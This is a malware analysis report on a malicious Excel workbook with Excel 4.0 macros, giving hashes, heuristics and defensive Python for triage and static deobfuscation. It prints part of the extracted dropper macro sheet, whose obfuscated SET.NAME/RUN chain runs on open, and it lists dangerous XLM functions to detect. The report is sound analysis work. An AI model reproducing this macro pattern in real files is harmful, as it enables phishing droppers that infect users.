Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b17553745e016653…

MALICIOUS

Office (OOXML)

Size: 64.1 KB
Created: 2020-07-12 19:02:17 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-09-15
MD5: 93897aa2998c1991834aa52bf86c0ad5
SHA-1: b91d37f744db2606709ec999f8eeb97c7b4c0514
SHA-256: b17553745e016653cace2242fbf6be5d91642e9ec2424d43f97d47576b2fc046
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The sample is an Excel workbook containing Excel 4.0 (XLM) macros, indicated by critical heuristic firings for OOXML_XLM_MACROSHEET and OOXML_XLM_AUTOOPEN_DEFINEDNAME: a macro sheet is present and the workbook defines an Auto_Open name, so the macro starts as soon as the user enables content. The macro sheet uses RUN, REGISTER, RETURN and HALT. REGISTER (binding a DLL export to a callable name) and RUN (transferring execution to another macro range) are the primitives XLM droppers use to download and execute payloads without touching VBA; RETURN and HALT are the control flow around them. The extracted sheet also assembles strings with SET.NAME from cell references scattered across the sheet (see the extracted artifact below), an obfuscation that keeps URLs and API names out of any single cell. The 'Macro/content-enable lure' heuristic further suggests the document is designed to trick the user into enabling content. The document body is truncated and unreadable, so it gives no direct clue to the lure.

Heuristics (6)

  • Excel 4.0 macro sheet (1 sheet) | critical | OOXML_XLM_MACROSHEET (2 related findings)
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name | critical | OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: the cell the name points at is executed when the workbook is opened (or closed) with macros enabled.
  • Dangerous XLM formula APIs: RUN, RETURN, REGISTER, HALT | critical | OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula functions that can reach Win32 or start processes without VBA (=CALL/=EXEC/=REGISTER, and =FORMULA to write cells that are executed later). Of the functions flagged here, REGISTER binds a DLL export to a callable name and RUN transfers execution to another macro range; RETURN and HALT are control flow and are flagged because they mark macro code rather than ordinary worksheet formulas.
  • Macro/content-enable lure | medium | SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
  • Hidden worksheet | low | OOXML_HIDDEN_SHEET
    Excel workbook contains 27 hidden sheet(s). Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five URLs below are OOXML XML namespace identifiers (they appear as xmlns declarations in the extracted macro sheet), not network indicators.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
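The three critical heuristics above are all structural and can be reproduced directly from the OOXML package: a part under xl/macrosheets/, an Auto_Open/Auto_Close defined name in xl/workbook.xml, and XLM function names inside the macro sheet's <f> elements, plus the hidden-sheet count from the sheet state attributes. The Python below is an added example, not the report's own tooling; it builds a small constructed workbook in the same shape as this sample (the cell addresses, names and formulas are lifted from the extracted sheet, the workbook.xml is invented for the example) and runs the four checks over it. The list of functions it treats as dangerous is an assumption chosen for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# XLM functions worth flagging (assumption: subset chosen for this example, not the report's list)
DANGEROUS_FNS = {"RUN", "REGISTER", "CALL", "EXEC", "FORMULA", "RETURN", "HALT"}


def build_sample_xlsx() -> bytes:
    """Constructed minimal workbook mirroring the report's shape (not the real sample)."""
    workbook_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_REL}">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Data" sheetId="3" state="veryHidden" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">Macro1!$BG$3305</definedName>
  </definedNames>
</workbook>"""
    macro_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="{NS_MAIN}" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
  <sheetData>
    <row r="3305"><c r="BG3305" t="b"><f>SET.NAME("SjVZynkewtRm",$BJ$20849&amp;$IC$25933)</f><v>0</v></c></row>
    <row r="3306"><c r="BG3306" t="b"><f>CUSTOM.UNDO(gzt(),"JhwpZIKe")</f><v>0</v></c></row>
    <row r="3307"><c r="BG3307" t="b"><f>RUN($CO$30587)</f><v>0</v></c></row>
    <row r="3308"><c r="BG3308" t="b"><f>RETURN()</f><v>0</v></c></row>
  </sheetData>
</xm:macrosheet>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", workbook_xml)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{NS_MAIN}"/>')
        z.writestr("xl/macrosheets/sheet1.xml", macro_xml)
    return buf.getvalue()


def triage_xlsx(data: bytes) -> dict:
    """Return the XLM-related indicators found in an OOXML workbook given as bytes."""
    findings = {"macrosheets": [], "auto_names": [], "hidden_sheets": 0,
                "dangerous_fns": set(), "formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Heuristic 1: any part under xl/macrosheets/ is an Excel 4.0 macro sheet.
        findings["macrosheets"] = sorted(
            n for n in names if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(z.read("xl/workbook.xml"))
            # Hidden-sheet count: state="hidden" or "veryHidden" on <sheet>.
            for s in wb.iter(f"{{{NS_MAIN}}}sheet"):
                if s.get("state") in ("hidden", "veryHidden"):
                    findings["hidden_sheets"] += 1
            # Heuristic 2: Auto_Open / Auto_Close defined names (with or without _xlnm. prefix).
            for dn in wb.iter(f"{{{NS_MAIN}}}definedName"):
                name = dn.get("name", "")
                if name.lower() in ("_xlnm.auto_open", "_xlnm.auto_close", "auto_open", "auto_close"):
                    findings["auto_names"].append((name, dn.text))
        # Heuristic 3: function names used in the macro sheet's formulas.
        for part in findings["macrosheets"]:
            root = ET.fromstring(z.read(part))
            for f in root.iter(f"{{{NS_MAIN}}}f"):
                text = f.text or ""
                findings["formulas"].append(text)
                for fn in re.findall(r"\b([A-Z][A-Z0-9.]*)\(", text):
                    if fn in DANGEROUS_FNS:
                        findings["dangerous_fns"].add(fn)
    # Auto-execution needs both a macro sheet and an auto name pointing into it.
    findings["xlm_autoexec"] = bool(findings["macrosheets"]) and bool(findings["auto_names"])
    return findings


if __name__ == "__main__":
    for k, v in triage_xlsx(build_sample_xlsx()).items():
        print(f"{k}: {v}")
```

For a real file, pass the on-disk bytes to triage_xlsx(); the function never executes anything from the workbook, it only reads the zip entries. Note that a workbook saved as .xlsb stores the same structures in a binary record format, so this text-XML parser does not apply to it.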

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_sheet_00.xml
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.xml
Size: 42036 bytes
SHA-256: 947e53c09cdc707927914619e1f1509a592412fba2a0a62f3bdeee65c970b201
Preview (first 1,000 lines of the extracted script)
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A65:IL59966"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><sheetData><row r="65" spans="65:65" x14ac:dyDescent="0.3"><c r="BM65"><v>11819</v></c></row><row r="66" spans="65:65" x14ac:dyDescent="0.3"><c r="BM66"><v>21</v></c></row><row r="389" spans="243:243" x14ac:dyDescent="0.3"><c r="II389"><v>2</v></c></row><row r="508" spans="24:24" x14ac:dyDescent="0.3"><c r="X508"><v>3</v></c></row><row r="571" spans="28:28" x14ac:dyDescent="0.3"><c r="AB571" t="s"><v>37</v></c></row><row r="595" spans="184:184" x14ac:dyDescent="0.3"><c r="GB595" t="s"><v>47</v></c></row><row r="627" spans="8:8" x14ac:dyDescent="0.3"><c r="H627" t="s"><v>3</v></c></row><row r="1151" spans="159:159" x14ac:dyDescent="0.3"><c r="FC1151" t="s"><v>35</v></c></row><row r="1382" spans="12:12" x14ac:dyDescent="0.3"><c r="L1382" t="s"><v>7</v></c></row><row r="2113" spans="73:73" x14ac:dyDescent="0.3"><c r="BU2113" t="s"><v>37</v></c></row><row r="2255" spans="161:161" x14ac:dyDescent="0.3"><c r="FE2255" t="s"><v>9</v></c></row><row r="2667" spans="146:146" x14ac:dyDescent="0.3"><c r="EP2667" t="s"><v>25</v></c></row><row r="2724" spans="144:144" x14ac:dyDescent="0.3"><c r="EN2724" t="s"><v>24</v></c></row><row r="2934" spans="234:234" x14ac:dyDescent="0.3"><c r="HZ2934" t="s"><v>18</v></c></row><row r="3305" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3305" t="b"><f>SET.NAME("SjVZynkewtRm",$BJ$20849&amp;$IC$25933&amp;$DT$42754&amp;$GJ$17549&amp;$FE$30102&amp;$FP$5113)</f><v>0</v></c></row><row r="3306" 
spans="59:59" x14ac:dyDescent="0.3"><c r="BG3306" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$FQ$28698)</f><v>0</v></c></row><row r="3307" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3307" t="b"><f>CUSTOM.UNDO(gzt(),"JhwpZIKe")</f><v>0</v></c></row><row r="3308" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3308" t="b"><f>RUN($CO$30587)</f><v>0</v></c></row><row r="3398" spans="166:166" x14ac:dyDescent="0.3"><c r="FJ3398" t="s"><v>39</v></c></row><row r="4357" spans="156:156" x14ac:dyDescent="0.3"><c r="EZ4357" t="s"><v>3</v></c></row><row r="4450" spans="187:187" x14ac:dyDescent="0.3"><c r="GE4450" t="s"><v>31</v></c></row><row r="4699" spans="135:135" x14ac:dyDescent="0.3"><c r="EE4699" t="s"><v>1</v></c></row><row r="4893" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4893" t="b"><f>SET.NAME("SjVZynkewtRm",$AX$35063&amp;$HA$21922&amp;$HZ$2934&amp;$BV$20540&amp;$BP$28933&amp;$EX$56938&amp;$EN$55439&amp;$II$389)</f><v>0</v></c></row><row r="4894" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4894" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$DQ$22550)</f><v>0</v></c></row><row r="4895" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4895" t="b"><f>CUSTOM.UNDO(gzt(),"MrzByEb")</f><v>0</v></c></row><row r="4896" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4896" t="b"><f>RUN($FX$10287)</f><v>0</v></c></row><row r="5007" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5007" t="b"><f>SET.NAME("SjVZynkewtRm",$GR$46256&amp;$CT$48306&amp;$CB$51726&amp;$CL$49219&amp;$GU$55804&amp;$B$53410&amp;$CK$12326&amp;$EU$15930&amp;$HW$33631&amp;$EH$18261)</f><v>0</v></c></row><row r="5008" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5008" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$CE$3709)</f><v>0</v></c></row><row r="5009" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5009" t="b"><f>CUSTOM.UNDO(gzt(),"axsWYFZe")</f><v>0</v></c></row><row r="5010" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5010" t="b"><f>RUN($GF$26025)</f><v>0</v></c></row><row r="5037" spans="245:245" x14ac:dyDescent="0.3"><c r="IK5037" 
t="s"><v>26</v></c></row><row r="5113" spans="172:172"
... (truncated)
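The extracted sheet shows the sample's execution pattern: each step is a SET.NAME that builds a string by concatenating cells scattered across the sheet ($BJ$20849&$IC$25933&...), followed by a CUSTOM.UNDO call and a RUN that jumps to another cell. Because the referenced cells hold only fragments, no single cell contains a recognisable URL or API name. The following Python is an added example, not part of the report or its tooling, that parses a macro sheet in this shape and statically resolves the SET.NAME concatenations and RUN targets. The sheet content, shared-strings table, the example.invalid URL fragments and the URLDownloadToFileA string are constructed for the example; the real sample's referenced cells and shared strings are not in the report.

```python
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"

# Constructed sample in the same shape as the extracted sheet (not the real macro sheet's content).
SHARED_STRINGS = ["http", "://", "exam", "ple", ".invalid/"]
MACROSHEET_XML = """<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
  xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>
<row r="65"><c r="BM65"><v>11819</v></c></row>
<row r="389"><c r="II389"><v>2</v></c></row>
<row r="571"><c r="AB571" t="s"><v>0</v></c></row>
<row r="595"><c r="GB595" t="s"><v>1</v></c></row>
<row r="627"><c r="H627" t="s"><v>2</v></c></row>
<row r="1151"><c r="FC1151" t="s"><v>3</v></c></row>
<row r="1382"><c r="L1382" t="s"><v>4</v></c></row>
<row r="2113"><c r="BU2113" t="str"><v>URLDownloadToFileA</v></c></row>
<row r="3305"><c r="BG3305" t="b"><f>SET.NAME("SjVZynkewtRm",$AB$571&amp;$GB$595&amp;$H$627&amp;$FC$1151&amp;$L$1382&amp;$II$389)</f><v>0</v></c></row>
<row r="3306"><c r="BG3306" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$BU$2113)</f><v>0</v></c></row>
<row r="3307"><c r="BG3307" t="b"><f>CUSTOM.UNDO(gzt(),"JhwpZIKe")</f><v>0</v></c></row>
<row r="3308"><c r="BG3308" t="b"><f>RUN($CO$30587)</f><v>0</v></c></row>
</sheetData></xm:macrosheet>"""

# Absolute or relative A1 reference, e.g. $BJ$20849 or II389.
CELL_REF = re.compile(r"\$?([A-Z]{1,3})\$?(\d+)")


def load_cells(xml_text, shared_strings):
    """Map cell address -> (display value, formula or None), resolving shared-string indices (t="s")."""
    root = ET.fromstring(xml_text)
    cells = {}
    for c in root.iter(NS + "c"):
        v = c.find(NS + "v")
        f = c.find(NS + "f")
        value = v.text if v is not None and v.text is not None else ""
        if c.get("t") == "s":
            idx = int(value)
            value = shared_strings[idx] if 0 <= idx < len(shared_strings) else ""
        cells[c.get("r")] = (value, f.text if f is not None else None)
    return cells


def resolve_set_names(cells):
    """Statically evaluate SET.NAME(name, ref&ref&...) by concatenating the referenced cells' values."""
    names = {}
    for ref, (_, formula) in cells.items():
        if not formula:
            continue
        m = re.match(r'SET\.NAME\("([^"]+)",(.+)\)$', formula)
        if not m:
            continue
        pieces = []
        for col, row in CELL_REF.findall(m.group(2)):
            # A reference to an empty or absent cell concatenates as "" in Excel; keep it visible as "".
            pieces.append(cells.get(f"{col}{row}", ("", None))[0])
        names[m.group(1)] = ("".join(pieces), ref)
    return names


def run_targets(cells):
    """List RUN() targets so the analyst knows which cell control flow jumps to next."""
    return [(ref, CELL_REF.search(formula).group(0))
            for ref, (_, formula) in cells.items()
            if formula and formula.startswith("RUN(")]


if __name__ == "__main__":
    cells = load_cells(MACROSHEET_XML, SHARED_STRINGS)
    for name, (value, where) in resolve_set_names(cells).items():
        print(f"{where}: {name} = {value!r}")
    for where, target in run_targets(cells):
        print(f"{where}: RUN -> {target}")
```

Against the real artifact the shared-strings table comes from xl/sharedStrings.xml in the same package, and the RUN targets usually point into the same sheet at cells well away from the visible formulas; following each target in turn recovers the full chain. The resolver is deliberately static: it never evaluates REGISTER or RUN, so it is safe to run on a live sample.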